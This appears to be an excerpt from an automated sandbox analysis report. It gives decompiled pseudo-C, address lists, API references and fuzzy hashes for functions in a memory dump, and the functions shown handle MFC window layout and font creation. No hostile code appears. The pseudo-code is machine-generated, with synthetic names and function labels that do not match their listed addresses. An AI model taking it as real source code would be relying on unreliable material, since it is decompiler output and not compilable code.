#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090D9
#641.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090E8
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090F4
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00409100
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040910C
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00409118
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00409124
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040912F
#798.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040913B

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#1200#1997#2818#4160#641#798
String ID:
API String ID: 1216907108-0
Opcode ID: 792b4d5c6f0f479e755c8854c95ff7656436eca129730b48e98cc40e2c2f9be7
Instruction ID: db976a60910eaccf231c8d6ff9946f9b4147bf62612f631616b468fdfd362d8f
Opcode Fuzzy Hash: 792b4d5c6f0f479e755c8854c95ff7656436eca129730b48e98cc40e2c2f9be7
Instruction Fuzzy Hash: DA117030909698DEDB05EBE5E1593DCFBB09F24318F90809EC00133292DBB81B4DDA26

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2B2, Relevance: 15.0, APIs: 10, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040A2B2(void* __eax) {
				void* _t28;
				void* _t45;

				_t28 = __eax;
				 *(_t45 - 4) = 7;
				if( *((intOrPtr*)(_t45 - 0x38)) == 0) {
					_push(0x805d);
					L00425E02();
					_push( *0x442154);
					_t28 = _t45 - 0x14;
					_push( *((intOrPtr*)(_t45 - 0x18)));
					_push(_t28);
					L00425FDC();
					_push(0);
					_push(0x10);
					_push( *((intOrPtr*)(_t45 - 0x14)));
					L00426030();
				} else {
					L00426036();
				}
				 *(_t45 - 4) = 0xe;
				L00425DFC();
				 *(_t45 - 4) = 6;
				L0042602A();
				 *(_t45 - 4) = 5;
				L00425DFC();
				 *(_t45 - 4) = 4;
				L00425DFC();
				 *(_t45 - 4) = 3;
				L00425DFC();
				 *(_t45 - 4) = 2;
				L00425DFC();
				 *(_t45 - 4) = 1;
				L00425DFC();
				 *(_t45 - 4) = 0;
				L00425DFC();
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				L00426024();
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t28;
			}

0x0040a2b2
0x0040a2b7
0x0040a2be
0x0040a2ca
0x0040a2d2
0x0040a2d7
0x0040a2dd
0x0040a2e0
0x0040a2e3
0x0040a2e4
0x0040a2ec
0x0040a2ed
0x0040a2ef
0x0040a2f2
0x0040a2c0
0x0040a2c3
0x0040a2c3
0x0040a2fd
0x0040a301
0x0040a30c
0x0040a310
0x0040a318
0x0040a31c
0x0040a324
0x0040a328
0x0040a330
0x0040a334
0x0040a33c
0x0040a340
0x0040a348
0x0040a34c
0x0040a354
0x0040a357
0x0040a35c
0x0040a363
0x0040a36d
0x0040a376

APIs

#1997.MFC42(00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A2C3
#4160.MFC42(0000805D,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A2D2
#2818.MFC42(?,?,0000805D,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A2E4
#1200.MFC42(?,00000010,00000000), ref: 0040A2F2
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A301
#641.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A310
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A31C
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A328
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A334
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A340
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A34C
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A357
#798.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040A363

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#1200#1997#2818#4160#641#798
String ID:
API String ID: 1216907108-0
Opcode ID: 792b4d5c6f0f479e755c8854c95ff7656436eca129730b48e98cc40e2c2f9be7
Instruction ID: ebdc20850a64f3b3d3d70123787d024246890fbd0b39435388c617a3b8825462
Opcode Fuzzy Hash: 792b4d5c6f0f479e755c8854c95ff7656436eca129730b48e98cc40e2c2f9be7
Instruction Fuzzy Hash: 7C117034909698DEDB05EBE5E1593DCFBB09F24318F90809EC00133292DBB81B5DDA26

Uniqueness

Uniqueness Score: -1.00%

Function 0041106B, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 228
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041106B(void* __ecx) {
				signed int _t110;
				signed int _t113;
				signed int _t115;
				void* _t117;
				signed int _t120;
				signed int* _t121;
				intOrPtr _t126;
				signed int _t130;
				signed int _t132;
				intOrPtr _t135;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				signed int _t145;
				signed int _t149;
				intOrPtr _t152;
				signed int _t155;
				intOrPtr _t157;
				intOrPtr _t168;
				signed int _t174;
				void* _t176;
				signed int _t178;
				signed int _t180;
				unsigned int _t182;
				signed int _t183;
				signed int _t184;
				void* _t186;

				L004269E6();
				_push(_t186 - 0x24);
				_push(_t186 - 0x1c);
				_t176 = __ecx;
				L00401F3C(__ecx, _t186 - 0x28);
				 *(_t186 - 0x20) =  *(_t186 - 0x20) & 0x00000000;
				_t142 =  *(_t186 + 8);
				 *(_t186 - 0x10) =  *(_t186 - 0x10) & 0x00000000;
				_t110 =  *(_t186 - 0x28);
				 *((intOrPtr*)(_t186 - 0x14)) = 2;
				while(1) {
					 *(_t186 - 0x18) = _t110;
					if(_t110 >  *(_t186 - 0x1c)) {
						break;
					}
					_t182 =  *( *((intOrPtr*)( *((intOrPtr*)(_t176 + 0x74)) + 0x84)) + _t110 * 4);
					if(_t182 >> 0x10 == 0) {
						L25:
						_t110 =  *(_t186 - 0x18) + 1;
						continue;
					}
					_t126 =  *((intOrPtr*)( *_t182 + 0xd0))();
					if(_t126 != 0) {
						_push(0x42dee8);
						L004264F2();
						 *((intOrPtr*)(_t186 - 0x2c)) = _t126;
						if(_t126 == 0) {
							GetWindowRect( *(_t182 + 0x20), _t186 - 0x3c);
							__eflags =  *(_t186 + 0xc);
							if( *(_t186 + 0xc) == 0) {
								_t130 =  *((intOrPtr*)(_t186 - 0x30)) -  *((intOrPtr*)(_t186 - 0x38));
								__eflags = _t130;
							} else {
								_t130 =  *((intOrPtr*)(_t186 - 0x34)) -  *(_t186 - 0x3c);
							}
						} else {
							if( *(_t186 + 0xc) == 0) {
								_t130 =  *(_t182 + 0xa8);
							} else {
								_t130 =  *(_t182 + 0x9c);
							}
						}
						_t132 = _t130;
						 *((intOrPtr*)(_t186 - 0x14)) =  *((intOrPtr*)(_t186 - 0x14)) + _t132;
						if( *((intOrPtr*)(_t186 - 0x14)) >  *(_t186 + 8)) {
							_t183 =  *(_t186 - 0x18);
							__eflags = _t183 -  *((intOrPtr*)(_t186 - 0x24));
							if(__eflags >= 0) {
								if(__eflags != 0) {
									_push(1);
									_push(0);
									_push(_t183);
									L0042658E();
									_t184 = _t183 - 1;
									__eflags = _t184;
									 *(_t186 - 0x1c) = _t184;
									break;
								}
								__eflags =  *(_t186 + 0xc);
								if( *(_t186 + 0xc) == 0) {
									 *(_t176 + 0x90) =  *(_t176 + 0xa8);
								} else {
									 *(_t176 + 0x84) =  *(_t176 + 0x9c);
								}
								L39:
								_push(1);
								_pop(0);
								L40:
								 *[fs:0x0] =  *((intOrPtr*)(_t186 - 0xc));
								return 0;
							}
							_push(1);
							_push(0);
							_push(_t183 + 1);
							L0042658E();
							goto L40;
						}
						if( *((intOrPtr*)(_t186 - 0x2c)) == 0) {
							_t142 = _t142 - _t132;
							__eflags = _t142;
						} else {
							if( *(_t186 + 0xc) == 0) {
								_t135 =  *((intOrPtr*)(_t182 + 0x90));
							} else {
								_t135 =  *((intOrPtr*)(_t182 + 0x84));
							}
							 *(_t186 - 0x20) =  *(_t186 - 0x20) + _t135;
							if( *(_t186 + 0xc) == 0) {
								_t138 =  *(_t182 + 0x8c);
							} else {
								_t138 =  *(_t182 + 0x88);
							}
							if( *(_t186 - 0x10) <= _t138) {
								if( *(_t186 + 0xc) == 0) {
									_t139 =  *(_t182 + 0x8c);
								} else {
									_t139 =  *(_t182 + 0x88);
								}
								 *(_t186 - 0x10) = _t139;
							}
						}
					}
					goto L25;
				}
				L0042650A();
				 *((intOrPtr*)(_t186 - 0x50)) = 0x42e334;
				 *(_t186 - 4) =  *(_t186 - 4) & 0x00000000;
				_t62 = _t186 - 0x50; // 0x42e334
				L00401E2E(_t176, _t62);
				_t149 =  *(_t186 - 0x48);
				__eflags = _t149 - 1;
				 *(_t186 + 8) = _t149;
				_t180 = _t142 -  *(_t186 - 0x20);
				if(_t149 != 1) {
					_t113 = 0;
					__eflags = _t149;
					if(_t149 <= 0) {
						while(1) {
							L46:
							__eflags = _t180;
							if(_t180 == 0) {
								break;
							} else {
								goto L47;
							}
							while(1) {
								L47:
								_t178 = 0;
								_t145 = _t180;
								__eflags =  *(_t186 + 8);
								if( *(_t186 + 8) <= 0) {
									break;
								} else {
									goto L48;
								}
								do {
									L48:
									__eflags =  *(_t186 + 0xc);
									_t152 =  *((intOrPtr*)( *((intOrPtr*)(_t186 - 0x4c)) + _t178 * 4));
									if( *(_t186 + 0xc) == 0) {
										_t168 =  *((intOrPtr*)(_t152 + 0xa8));
									} else {
										_t168 =  *((intOrPtr*)(_t152 + 0x9c));
									}
									__eflags =  *(_t186 + 0xc);
									if( *(_t186 + 0xc) == 0) {
										_t117 =  *(_t152 + 0x90);
									} else {
										_t117 =  *(_t152 + 0x84);
									}
									__eflags = _t117 - _t168;
									if(_t117 != _t168) {
										L56:
										__eflags =  *(_t152 + 0xd8);
										if( *(_t152 + 0xd8) != 0) {
											goto L61;
										}
										__eflags = _t180;
										asm("sbb eax, eax");
										_t120 =  ~_t180 & ((0 | _t180 >= 0x00000000) - 0x00000001 & 0xfffffffe) + 0x00000001;
										__eflags =  *(_t186 + 0xc);
										if( *(_t186 + 0xc) == 0) {
											_t155 = _t152 + 0x90;
											__eflags = _t155;
										} else {
											_t155 = _t152 + 0x84;
										}
										 *_t155 =  *_t155 + _t120;
										_t180 = _t180 - _t120;
										__eflags = _t180;
										if(_t180 == 0) {
											break;
										} else {
											goto L61;
										}
									} else {
										__eflags = _t180;
										if(_t180 < 0) {
											goto L61;
										}
										goto L56;
									}
									L61:
									_t178 = _t178 + 1;
									__eflags = _t178 -  *(_t186 + 8);
								} while (_t178 <  *(_t186 + 8));
								__eflags = _t145 - _t180;
								if(_t145 == _t180) {
									break;
								}
								__eflags = _t180;
								if(_t180 != 0) {
									continue;
								}
								break;
							}
							_t115 = 0;
							__eflags =  *(_t186 + 8);
							if( *(_t186 + 8) <= 0) {
								continue;
							} else {
								goto L65;
							}
							do {
								L65:
								 *( *((intOrPtr*)( *((intOrPtr*)(_t186 - 0x4c)) + _t115 * 4)) + 0xd8) =  *( *((intOrPtr*)( *((intOrPtr*)(_t186 - 0x4c)) + _t115 * 4)) + 0xd8) & 0x00000000;
								_t115 = _t115 + 1;
								__eflags = _t115 -  *(_t186 + 8);
							} while (_t115 <  *(_t186 + 8));
						}
						L38:
						_t71 = _t186 - 4;
						 *_t71 =  *(_t186 - 4) | 0xffffffff;
						__eflags =  *_t71;
						L00426504();
						goto L39;
					} else {
						goto L42;
					}
					do {
						L42:
						__eflags =  *(_t186 + 0xc);
						_t174 =  *(_t186 - 0x10);
						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t186 - 0x4c)) + _t113 * 4));
						if( *(_t186 + 0xc) == 0) {
							 *(_t157 + 0x8c) = _t174;
						} else {
							 *(_t157 + 0x88) = _t174;
						}
						_t113 = _t113 + 1;
						__eflags = _t113 -  *(_t186 + 8);
					} while (_t113 <  *(_t186 + 8));
					goto L46;
				}
				__eflags = _t180;
				if(_t180 != 0) {
					 *(_t176 + 0xd8) =  *(_t176 + 0xd8) & 0x00000000;
					__eflags =  *(_t186 + 0xc);
					_t121 = _t176 + 0x84;
					if( *(_t186 + 0xc) == 0) {
						_t121 = _t176 + 0x90;
					}
					 *_t121 =  *_t121 + _t180;
					__eflags =  *_t121;
				}
				goto L38;
			}

0x00411070
0x0041107e
0x00411082
0x00411086
0x00411089
0x0041108e
0x00411092
0x00411095
0x00411099
0x0041109c
0x004110a3
0x004110a6
0x004110a9
0x00000000
0x00000000
0x004110b8
0x004110c3
0x00411183
0x00411186
0x00000000
0x00411186
0x004110cd
0x004110d5
0x004110db
0x004110e2
0x004110e9
0x004110ec
0x0041110b
0x00411111
0x00411115
0x00411122
0x00411122
0x00411117
0x0041111a
0x0041111a
0x004110ee
0x004110f2
0x004110fc
0x004110f4
0x004110f4
0x004110f4
0x004110f2
0x00411126
0x00411127
0x00411130
0x0041118c
0x0041118f
0x00411192
0x004111af
0x004111d6
0x004111d8
0x004111da
0x004111e1
0x004111e6
0x004111e6
0x004111e7
0x00000000
0x004111e7
0x004111b1
0x004111b5
0x004111cb
0x004111b7
0x004111bd
0x004111bd
0x00411243
0x00411243
0x00411245
0x00411246
0x0041124c
0x00411254
0x00411254
0x00411197
0x0041119a
0x0041119c
0x004111a3
0x00000000
0x004111a8
0x00411137
0x00411181
0x00411181
0x00411139
0x0041113c
0x00411146
0x0041113e
0x0041113e
0x0041113e
0x0041114e
0x00411154
0x0041115e
0x00411156
0x00411156
0x00411156
0x00411167
0x0041116c
0x00411179
0x0041116e
0x0041116e
0x0041116e
0x00411174
0x00411174
0x00411167
0x00411137
0x00000000
0x004110d5
0x004111ed
0x004111f2
0x004111f9
0x004111fd
0x00411203
0x00411208
0x0041120e
0x00411211
0x00411214
0x00411216
0x00411257
0x00411259
0x0041125b
0x00411280
0x00411280
0x00411280
0x00411282
0x00000000
0x00000000
0x00000000
0x00000000
0x00411284
0x00411284
0x00411284
0x00411286
0x00411288
0x0041128b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041128d
0x0041128d
0x00411290
0x00411294
0x00411297
0x004112a1
0x00411299
0x00411299
0x00411299
0x004112a7
0x004112ab
0x004112b5
0x004112ad
0x004112ad
0x004112ad
0x004112bb
0x004112bd
0x004112c3
0x004112c3
0x004112ca
0x00000000
0x00000000
0x004112d0
0x004112dc
0x004112de
0x004112e0
0x004112e4
0x004112ee
0x004112ee
0x004112e6
0x004112e6
0x004112e6
0x004112f4
0x004112f6
0x004112f6
0x004112f8
0x00000000
0x00000000
0x00000000
0x00000000
0x004112bf
0x004112bf
0x004112c1
0x00000000
0x00000000
0x00000000
0x004112c1
0x004112fa
0x004112fa
0x004112fb
0x004112fb
0x00411300
0x00411302
0x00000000
0x00000000
0x00411304
0x00411306
0x00000000
0x00000000
0x00000000
0x00411306
0x0041130c
0x0041130e
0x00411311
0x00000000
0x00000000
0x00000000
0x00000000
0x00411317
0x00411317
0x0041131d
0x00411324
0x00411325
0x00411325
0x0041132a
0x00411237
0x00411237
0x00411237
0x00411237
0x0041123e
0x00000000
0x00000000
0x00000000
0x00000000
0x0041125d
0x0041125d
0x00411260
0x00411264
0x00411267
0x0041126a
0x00411274
0x0041126c
0x0041126c
0x0041126c
0x0041127a
0x0041127b
0x0041127b
0x00000000
0x0041125d
0x00411218
0x0041121a
0x0041121c
0x00411223
0x00411227
0x0041122d
0x0041122f
0x0041122f
0x00411235
0x00411235
0x00411235
0x00000000

APIs

_EH_prolog.MSVCRT ref: 00411070
#4083.MFC42(0042DEE8), ref: 004110E2
#3986.MFC42(?,00000000,00000001), ref: 004111A3
#3986.MFC42(?,00000000,00000001), ref: 004111E1
#500.MFC42(?,?,?), ref: 004111ED
#772.MFC42(4B,?,?,?), ref: 0041123E

Strings

4B, xrefs: 004111FD, 00411200

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3986$#4083#500#772H_prolog
String ID: 4B
API String ID: 2485564967-455405905
Opcode ID: 35ad4cb93f39cbaacf48d54ef44830e6ac1c5ba5036122b8709c1b00b31481ab
Instruction ID: 9dcc68cf8fa3d86763cfb2ecb3da74f7fe6d65efe395edb6884aca115c7b9cbb
Opcode Fuzzy Hash: 35ad4cb93f39cbaacf48d54ef44830e6ac1c5ba5036122b8709c1b00b31481ab
Instruction Fuzzy Hash: 53916031A00615EFDB14CFA4C484BEEB7B1FF48315F14816AD616EB660D778AD82CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401681, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00401681(intOrPtr* __ecx) {
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr* _t74;
				intOrPtr _t75;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr _t99;
				intOrPtr* _t106;
				signed int _t116;
				void* _t121;
				intOrPtr* _t122;
				void* _t127;

				L004269E6();
				_t116 = 0;
				_t90 = __ecx;
				if( *((intOrPtr*)(_t127 + 0xc)) == 0) {
					L0042650A();
					 *((intOrPtr*)(_t127 - 0x30)) = 0x42e334;
					_t12 = _t127 - 0x30; // 0x42e334
					 *(_t127 - 4) = 0;
					L00401E2E(__ecx, _t12);
					if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x74)) + 0x94)) == 0) {
						 *(_t127 - 0x50) = BeginDeferWindowPos( *(_t127 - 0x28));
					} else {
						 *(_t127 - 0x50) = 0;
					}
					if( *(_t127 - 0x28) <= 0) {
						L12:
						if( *(_t127 - 0x50) != 0) {
							EndDeferWindowPos( *(_t127 - 0x50));
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(IsRectEmpty(_t127 - 0x1c) != 0) {
							GetClientRect( *( *((intOrPtr*)(_t90 + 0x70)) + 0x20), _t127 - 0x1c);
						}
						if( *((intOrPtr*)(_t127 + 0x10)) == 0) {
							_t121 =  *((intOrPtr*)(_t127 - 0x10)) -  *((intOrPtr*)(_t127 - 0x18));
						} else {
							_t121 =  *((intOrPtr*)(_t127 - 0x14)) -  *(_t127 - 0x1c) + 2;
						}
						if( *((intOrPtr*)( *_t90 + 0xd0))() != 0 && L00401FC8(_t90) == 0 &&  *((intOrPtr*)(_t90 + 0xdc)) != 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t127 - 0x2c)))) == _t90) {
							_push(0 |  *((intOrPtr*)(_t127 + 0x10)) != 0x00000000);
							_push(_t121);
							if(L00401E74(_t90) != 0) {
								 *((intOrPtr*)( *_t90 + 0x110))();
							}
						}
						 *((intOrPtr*)(_t90 + 0xdc)) = 0;
						if( *((intOrPtr*)(_t127 + 0x10)) == 0) {
							_t72 =  *((intOrPtr*)(_t90 + 0xa8));
							_t99 =  *((intOrPtr*)(_t90 + 0x90));
							if(_t72 > _t99) {
								_t99 = _t72;
							}
							_t73 =  *((intOrPtr*)(_t90 + 0xa4));
							_t91 =  *((intOrPtr*)(_t90 + 0x8c));
						} else {
							_t75 =  *((intOrPtr*)(_t90 + 0xa0));
							_t99 =  *((intOrPtr*)(_t90 + 0x88));
							if(_t75 > _t99) {
								_t99 = _t75;
							}
							_t73 =  *((intOrPtr*)(_t90 + 0x9c));
							_t91 =  *((intOrPtr*)(_t90 + 0x84));
						}
						if(_t73 <= _t91) {
							_t73 = _t91;
						}
						_t122 =  *((intOrPtr*)(_t127 + 8));
						 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
						 *_t122 = _t73;
						 *((intOrPtr*)(_t122 + 4)) = _t99;
						L00426504();
						_t74 = _t122;
						goto L35;
					} else {
						do {
							_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t127 - 0x2c)) + _t116 * 4));
							if(( *(_t106 + 0x64) & 0x00000003) != 0) {
								 *((intOrPtr*)( *_t106 + 0xd4))(_t127 - 0x50);
							}
							_t116 = _t116 + 1;
						} while (_t116 <  *(_t127 - 0x28));
						goto L12;
					}
				} else {
					if( *((intOrPtr*)(_t127 + 0x10)) == 0) {
						_t74 =  *((intOrPtr*)(_t127 + 8));
						 *_t74 =  *((intOrPtr*)(__ecx + 0x8c));
						 *((intOrPtr*)(_t74 + 4)) = 0x7fff;
					} else {
						_t74 =  *((intOrPtr*)(_t127 + 8));
						 *_t74 = 0x7fff;
						 *((intOrPtr*)(_t74 + 4)) =  *((intOrPtr*)(__ecx + 0x88));
					}
					L35:
					 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0xc));
					return _t74;
				}
			}

0x0040fef1
0x0040fefb
0x0040fefd
0x0040ff02
0x0040ff40
0x0040ff45
0x0040ff4c
0x0040ff52
0x0040ff55
0x0040ff60
0x0040ff70
0x0040ff62
0x0040ff62
0x0040ff62
0x0040ff77
0x0040ff97
0x0040ff9b
0x0040ffa0
0x0040ffa0
0x0040ffaf
0x0040ffb0
0x0040ffb1
0x0040ffb6
0x0040ffbf
0x0040ffcb
0x0040ffcb
0x0040ffd6
0x0040ffe9
0x0040ffd8
0x0040ffdf
0x0040ffdf
0x0040fff6
0x0041001c
0x0041001d
0x00410025
0x0041002b
0x0041002b
0x00410025
0x00410034
0x0041003b
0x0041005d
0x00410063
0x0041006b
0x0041006d
0x0041006d
0x0041006f
0x00410075
0x0041003d
0x0041003d
0x00410043
0x0041004b
0x0041004d
0x0041004d
0x0041004f
0x00410055
0x00410055
0x0041007d
0x0041007f
0x0041007f
0x00410081
0x00410084
0x00410088
0x0041008a
0x00410090
0x00410095
0x00000000
0x0040ff79
0x0040ff79
0x0040ff7c
0x0040ff83
0x0040ff8b
0x0040ff8b
0x0040ff91
0x0040ff92
0x00000000
0x0040ff79
0x0040ff04
0x0040ff07
0x0040ff21
0x0040ff2f
0x0040ff31
0x0040ff09
0x0040ff09
0x0040ff17
0x0040ff19
0x0040ff19
0x00410097
0x0041009c
0x004100a4
0x004100a4

APIs

_EH_prolog.MSVCRT ref: 0040FEF1
#500.MFC42 ref: 0040FF40
EndDeferWindowPos.USER32(00000000), ref: 0040FFA0
IsRectEmpty.USER32(?), ref: 0040FFB7
GetClientRect.USER32 ref: 0040FFCB

Strings

4B, xrefs: 0040FF4C, 0040FF51

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$#500ClientDeferEmptyH_prologWindow
String ID: 4B
API String ID: 608460257-455405905
Opcode ID: f7c3c4faa0489aa711c5a7260830754e88dbc69358711e435972e857cbed4fd7
Instruction ID: 7c5ad157890f1bdfd346268783f047a183102b265e78b4f3355c015339179dda
Opcode Fuzzy Hash: f7c3c4faa0489aa711c5a7260830754e88dbc69358711e435972e857cbed4fd7
Instruction Fuzzy Hash: 5A512C31A00216DFCB15DF68D884BEEBBB1FF49304F04417BE809AB696C7789885CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004012C6, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004012C6(void* __ecx) {
				struct HFONT__* _t18;
				void* _t27;

				L004269E6();
				 *(_t27 - 0x174) = 0x154;
				SystemParametersInfoA(0x29, 0, _t27 - 0x174, 0);
				_push(0);
				L0042654C();
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				GetDeviceCaps( *(_t27 - 0x1c), 0x5a);
				_t18 = CreateFontIndirectA(_t27 - 0x98);
				_push(_t18);
				L004264BC();
				 *(_t27 - 4) =  *(_t27 - 4) | 0xffffffff;
				L00426522();
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return _t18;
			}

0x00421a4b
0x00421a66
0x00421a70
0x00421a76
0x00421a7b
0x00421a80
0x00421a89
0x00421a96
0x00421a9c
0x00421aa3
0x00421aa8
0x00421aaf
0x00421ab8
0x00421ac0

APIs

_EH_prolog.MSVCRT ref: 00421A4B
SystemParametersInfoA.USER32(00000029,00000000), ref: 00421A70
#562.MFC42(00000000), ref: 00421A7B
GetDeviceCaps.GDI32(?,0000005A), ref: 00421A89
CreateFontIndirectA.GDI32(?), ref: 00421A96
#1641.MFC42(00000000), ref: 00421AA3
#816.MFC42(00000000), ref: 00421AAF

Strings

cbw, xrefs: 00421A89

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
